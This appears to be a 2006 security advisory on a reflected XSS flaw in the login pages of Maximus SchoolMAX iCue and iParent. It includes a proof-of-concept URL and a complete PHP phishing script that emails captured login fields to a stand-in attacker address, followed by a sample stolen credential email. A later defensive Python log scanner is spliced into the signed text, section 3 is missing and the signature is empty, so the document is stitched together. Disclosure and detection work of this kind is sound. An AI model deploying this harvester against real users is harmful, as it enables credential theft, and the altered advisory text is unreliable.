Topic: XSS Vulnerability in Maximus SchoolMAX

SecurityAlert: 1121
CVE: CVE-2006-3143
SecurityRisk: Low
Remote Exploit: Yes
Local Exploit: No
Exploit Available: Yes
Credit: Fixer (fixer gci net)
Published: 23.06.2006

Affected Software: Maximus' iCue and iParent

Advisory Content:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

The InfoGuard Group Vulnerability Summary 2006-04

Application: Maximus' iCue and iParent (http://www.schoolmax.net)
Versions: All
Bugs: Cross-Site Scripting (XSS)
Date: 18 June 2006
Author: Charles H.
E-mail: charles (at) infoguardgroup (dot) com
Website: http://www.infoguardgroup.com

1) Introduction

SchoolMAX from MAXIMUS is one of the most technologically advanced
student information systems available today. It is district-based yet
still provides for school-based management capabilities and controls.

http://www.maximus.com/corporate/pages/SchoolMAX.asp

2) Login XSS

The login.asp file associated with SchoolMAX's iCue and iParent
applications suffers from a Cross-Site Scripting flaw. This can result
in cookie and/or credentials theft, especially if used in conjunction
with a social engineering attack. A simple attack against iCue might
look like this:

https://icue.victimsite.us/toas/icue_login.asp?error_msg=These%20aren't%20the%20droids%20you're%20looking%20for

This will result in the message "These aren't the droids you're looking
for" being displayed.

This shows the basic idea of the XSS. You can perform various
obfuscation techniques to hide the message.

Additionally, when used in conjunction with social engineering, user
credentials can be easily obtained.

If we take a PHP file like this:

<?php

$my_email = "h@x0r (at) evil (dot) net";

$header =
"https://iparent.victimsite.us:8443/iparent/sv_login_secure.asp?invalid_
login=true&DST_NBR=&error_msg=Invalid%20login.&USER_NME=&ID=&AT=&SCHNBR=
";

if ($_SERVER['REQUEST_METHOD'] != "POST"){exit;}

$disallowed_name = array(':',';',"'",'"','=','(',')','{','}','@');

foreach($disallowed_name as $value)
{

if(stristr($_POST[Name],$value)){header("location:
$_SERVER[HTTP_REFERER]");exit;}

}

$disallowed_email = array(':',';',"'",'"','=','(',')','{','}');

foreach($disallowed_email as $value)
{

if(stristr($_POST[Email],$value)){header("location:
$_SERVER[HTTP_REFERER]");exit;}

}

$message = "";

while(list($key,$value) =
each($_POST)){if(!(empty($value))){$set=1;}$message = $message . "$key:
$valuenn";} if($set!==1){header("location: $_SERVER[HTTP_REFERER]");exit;}

$message = $message . "-- nThank you for exploiting iParent";
$message = stripslashes($message);

$subject = "FormToEmail Comments";
$headers = "From: " . $_POST['Email'] . "n" . "Return-Path: " .
$_POST['Email'] . "n" . "Reply-To: " . $_POST['Email'] . "n";

mail($my_email,$subject,$message,$headers);
header( "Location:
https://iparent.victimsite.us:8443/iparent/sv_login_secure.asp?invalid_l
ogin=true&DST_NBR=&error_msg=Invalid%20login.&USER_NME=&ID=&AT=&SCHNBR="

);

?>

If this file is posted somewhere and a forged e-mail redirects the
victim to it, the credentials can be captured. When that happens,
here's what the attacker gets in the e-mail:

Subject: FormToEmail Comments
Date: Mon, 06 Mar 2006 21:48:05 -0900 (AKST)
From: Nobody <nobody (at) victimsite (dot) us>
To: Badguy (at) evil (dot) net

DST_NBR: 1111

USER_NME: 4564654

OPER_PASS: 123456

login: Log in

4) Patch Status

Maximus has been contacted multiple times since this issue was
discovered in March. To date, they have not responded.
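
A defender-side check for the reflected error_msg parameter described above, added here as an example (it is not part of the original advisory or of the vendor's code): it scans web access logs for requests to the two login pages whose error_msg is not a message the application itself produces. The combined log format, the KNOWN_MESSAGES allowlist and the sample log lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Login pages named in the advisory that reflect error_msg into the response.
LOGIN_PAGES = ("icue_login.asp", "sv_login_secure.asp")
# Assumption: the messages the application itself emits. Only "Invalid login."
# appears in the advisory; extend the set from your own deployment.
KNOWN_MESSAGES = {"", "Invalid login."}
# Markup indicators that never belong in a plain status message.
MARKUP = re.compile(r'[<>"]|&#|javascript:', re.IGNORECASE)
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(log_line):
    """Return None for a benign line, else (severity, decoded error_msg)."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith(LOGIN_PAGES):
        return None
    # parse_qs percent-decodes once, matching what the page would reflect.
    for msg in parse_qs(url.query, keep_blank_values=True).get("error_msg", []):
        if msg not in KNOWN_MESSAGES:
            return ("markup" if MARKUP.search(msg) else "unexpected-text", msg)
    return None

def scan(lines):
    """Return (line_number, severity, message) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        verdict = classify(line)
        if verdict:
            hits.append((number, *verdict))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Mar/2006:21:40:01 -0900] "GET /toas/icue_login.asp HTTP/1.1" 200 5120',
    '192.0.2.11 - - [06/Mar/2006:21:41:17 -0900] "GET /iparent/sv_login_secure.asp?invalid_login=true&DST_NBR=&error_msg=Invalid%20login.&USER_NME= HTTP/1.1" 200 5301',
    '198.51.100.7 - - [06/Mar/2006:21:44:52 -0900] "GET /toas/icue_login.asp?error_msg=These%20aren%27t%20the%20droids%20you%27re%20looking%20for HTTP/1.1" 200 5188',
    '198.51.100.7 - - [06/Mar/2006:21:45:30 -0900] "GET /toas/icue_login.asp?error_msg=%3Cb%3Etest%3C%2Fb%3E HTTP/1.1" 200 5190',
]

if __name__ == "__main__":
    for number, severity, msg in scan(SAMPLE_LOG):
        print(f"line {number}: {severity}: {msg!r}")
```

An "unexpected-text" hit corresponds to the plain-message injection shown in section 2; a "markup" hit means the value carried HTML or script indicators.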
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

-----END PGP SIGNATURE-----




